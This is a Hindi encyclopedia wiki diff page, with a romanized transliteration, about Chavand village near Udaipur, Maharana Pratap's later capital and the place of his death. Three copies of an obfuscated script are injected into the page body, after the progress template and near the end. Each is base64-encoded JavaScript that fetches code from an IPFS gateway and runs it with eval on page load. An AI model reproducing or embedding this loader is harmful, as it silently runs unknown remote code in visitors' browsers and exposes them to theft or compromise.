Difference between revisions of "चावंड उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{राजस्थान}}" to "{{राजस्थान के पर्यटन स्थल}}")
m (Text replacement - "शृंखला" to "श्रृंखला")
 
(12 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।
+
'''चावंड''' [[राजस्थान]] के [[उदयपुर]] से [[ऋषभदेव उदयपुर|ऋषभदेव]] जाने वाली सड़क पर सघन [[अरावली पर्वत श्रृंखला|अरावली पहाड़ियों]] के पठारी भाग में बसा हुआ एक गाँव है। चावंड जिस पहाड़ी इलाक़े में बसा हुआ है, वह 'छप्पन' का इलाक़ा कहलाता है।  
*चावंड नाम का पुराना गाँव उदयपुर से [[खैरवाड़े]] जाने वाली सड़क पर परसाद गाँव से करीब ६ मील पूर्व की तरफ है।  
+
==इतिहास==
*यहाँ एक जैन-मंदिर है।
+
चावंड पहले छप्पनियें राठौड़ों का वतन था। महाराणा प्रताप ने इस पर आक्रमण कर [[हल्दीघाटी का युद्ध|हल्दीघाटी युद्ध]] के पश्चात् अपनी नयी राजधानी बनाया। चावंड गाँव से सटी हुई पहाड़ी पर प्रताप ने महल बनवाये थे जो आज खण्डहर मात्र हैं। यहाँ के खण्डहरों के निचले भाग में चामुण्डा माता का मन्दिर बना हुआ है। यह मन्दिर [[महाराणा प्रताप]] ने ही बनवाया था। यह भी उल्लेखनीय है कि महाराणा प्रताप की मृत्यु चावंड में ही हुई थी।<ref>वीर विनोद 11, पृ. 159</ref> चावंड गाँव से लगभग डेढ़ मील दूर बण्डोली गाँव है, उसके पास जो नाला बहता है, उसी नाले के किनारे प्रताप का दाह संस्कार किया गया था। इस स्थल पर स्मारक स्वरूप एक छतरी बनी हुई है
*[[महाराणा प्रताप]] के महल गाँव से आधे मील की दूरी पर,पहाड़ी पर बने हुए हैं और उसके नीचे देवी का एक मंदिर है।  
 
*महाराणा प्रताप का स्वर्गवास इन्हीं पहाड़ियों की श्रेणी के बीच हुआ था।
 
*इनका अग्नि संस्कार इस स्थान से डेढ़ मील की दूरी पर बंडोली गाँव के पास बहने वाले एक छोटे से नाले के तट पर किया गया था।
 
*स्मारक के रुप में वहाँ श्वेत-पाषाण की आठ स्तम्भोंवाली एक छोटी सी छत्री बनी है।
 
  
==सम्बंधित लिंक==
+
{{लेख प्रगति
{{राजस्थान के पर्यटन स्थल}}
+
|आधार=
[[Category:राजस्थान]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__
+
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==संबंधित लेख==
 +
{{राजस्थान के ऐतिहासिक स्थान}}{{राजस्थान के पर्यटन स्थल}}
 +
[[Category:उदयपुर]][[Category:उदयपुर_के_पर्यटन_स्थल]]
 +
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]]
 +
[[Category:राजस्थान के ऐतिहासिक स्थान]]
 +
[[Category:ऐतिहासिक स्थान कोश]]
 +
[[Category:पर्यटन_कोश]]
 +
__INDEX__

Latest revision as of 11:08, 9 February 2021

chavand rajasthan ke udayapur se rrishabhadev jane vali s dak par saghan aravali paha diyoan ke pathari bhag mean basa hua ek gaanv hai. chavand jis paha di ilaqe mean basa hua hai, vah 'chhappan' ka ilaqa kahalata hai.

itihas

chavand pahale chhappaniyean rathau doan ka vatan tha. maharana pratap ne is par akraman kar haldighati yuddh ke pashchath apani nayi rajadhani banaya. chavand gaanv se sati huee paha di par pratap ne mahal banavaye the jo aj khandahar matr haian. yahaan ke khandaharoan ke nichale bhag mean chamunda mata ka mandir bana hua hai. yah mandir maharana pratap ne hi banavaya tha. yah bhi ullekhaniy hai ki maharana pratap ki mrityu chavand mean hi huee thi.[1] chavand gaanv se lagabhag dedh mil door bandoli gaanv hai, usake pas jo nala bahata hai, usi nale ke kinare pratap ka dah sanskar kiya gaya tha. is sthal par smarak svaroop ek chhatari bani huee hai


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. vir vinod 11, pri. 159

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>